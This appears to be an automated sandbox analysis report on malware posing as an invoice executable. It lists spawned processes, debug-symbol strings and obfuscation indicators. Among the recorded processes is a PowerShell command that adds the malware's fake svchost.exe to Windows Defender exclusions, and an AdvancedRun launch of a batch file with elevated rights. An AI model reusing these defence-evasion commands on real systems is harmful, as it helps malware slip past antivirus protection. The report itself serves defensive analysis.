        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287994.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: shcore.pdb= source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: .pdb>X source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbR source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: System.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: .ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: clr.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ility.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Microsoft.VisualBasic.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.pdbe source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdbx source: WerFault.exe, 00000011.00000003.772085355.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb&;$ source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: System.Xml.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb{ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbN source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdbq source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Core.pdb, source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: rasapi32.pdbe source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdbc source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854050240.000000000122B000.00000004.00000020.sdmp
        Source: Binary string: shlwapi.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdbS source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: powrprof.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb3 source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb" source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: comctl32v582.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cldapi.pdb5 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb} source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb+ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: version.pdb/ source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: ml.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: dhcpcsvc6.pdbo source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: nsi.pdbX source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb) source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Accessibility.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rawing.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: winhttp.pdb\ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdbw source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287994.PDB source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: mscorlib.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: fltLib.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb! source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb[ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb9 source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 13.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Binary contains a suspicious time stampShow sources
        Source: initial sampleStatic PE information: 0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_0040289F
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeCode function: 0_2_08A27150 pushfd ; ret 0_2_08A27151
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret 3_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B550 push eax; ret 3_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040B50D push ecx; ret 3_2_0040B51D
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret 4_2_0040B564
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B550 push eax; ret 4_2_0040B58C
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 4_2_0040B50D push ecx; ret 4_2_0040B51D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_033CF580 pushad ; ret 5_2_033CF599
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03464280 pushad ; ret 5_2_03464294
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0346D7B1 push 000000C3h; ret 5_2_0346D7E8
